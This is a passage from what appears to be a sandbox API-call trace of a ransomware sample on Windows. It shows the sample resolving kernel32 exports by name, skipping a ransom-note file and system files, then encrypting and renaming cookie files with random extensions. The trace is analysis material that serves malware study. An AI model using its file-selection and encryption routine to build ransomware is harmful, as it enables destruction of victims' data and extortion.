returned="DuplicateConsoleHandle" [0181.926] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.927] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.927] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.927] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.927] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.927] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.927] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.927] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.927] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.927] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.927] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.927] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.927] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.927] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.927] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.927] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.927] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.927] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.928] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.928] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp") returned 120 [0181.928] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp.FwzBA9") returned 127 [0181.928] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.evbelfp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.eVBeLFp.FwzBA9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt.evbelfp.fwzba9"), dwFlags=0x0) returned 1 [0181.929] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.929] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.929] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.929] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbfa5cef0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbfa5cef0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xab92c800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x17e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", cAlternateFileName="5P5NRG~1.NF4")) returned 1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="DECRYPT-FILES.txt") returned -1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="autorun.inf") returned -1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="boot.ini") returned -1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="desktop.ini") returned -1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="ntuser.dat") returned -1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="iconcache.db") returned -1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="bootsect.bak") returned -1 [0181.929] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="ntuser.dat.log") returned -1 [0181.930] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="thumbs.db") returned -1 [0181.930] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46", lpString2="Bootfont.bin") returned -1 [0181.930] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46") returned 42 [0181.930] lstrcmpiW (lpString1="nF46", lpString2="lnk") returned 1 [0181.930] lstrcmpiW (lpString1="nF46", lpString2="exe") returned 1 [0181.930] lstrcmpiW (lpString1="nF46", lpString2="sys") returned -1 [0181.930] lstrcmpiW (lpString1="nF46", lpString2="dll") returned 1 [0181.930] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.930] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46") returned 42 [0181.930] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0181.930] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46" [0181.930] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nF46" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt.nf46"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0181.930] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=382) returned 1 [0181.931] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0181.931] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.931] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.931] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.931] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.931] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0181.932] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.932] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.932] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.932] CloseHandle (hObject=0x288) returned 1 [0181.932] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.932] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0181.933] CloseHandle (hObject=0x0) returned 0 [0181.933] CloseHandle (hObject=0x284) returned 1 [0181.933] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.934] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.934] GetTickCount () returned 0x1134df2 [0181.934] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.934] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.934] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.934] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.935] lstrlenA (lpString="kernel32.dll") returned 12 [0181.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.935] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.935] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.935] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.935] lstrlenA (lpString="ADDATOMA") returned 8 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.935] lstrlenA (lpString="ADDATOMW") returned 8 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.935] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.935] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.935] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.935] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.935] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.935] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.935] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.935] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.935] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.935] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.935] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.936] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.936] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.936] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.936] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.936] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.936] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.936] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.937] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.937] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.937] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.937] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.937] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.937] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.937] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.937] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.937] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.937] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.937] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.937] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.937] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.937] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.937] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.937] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.937] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.937] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.937] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.938] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.938] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.938] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.938] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.938] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.938] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.938] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.938] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.938] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.938] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.938] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.938] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.938] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.938] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.938] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.938] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.938] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.938] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.938] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.938] lstrlenA (lpString="BEEP") returned 4 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.939] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.939] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.939] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.939] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.939] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.939] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.939] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.939] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.939] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 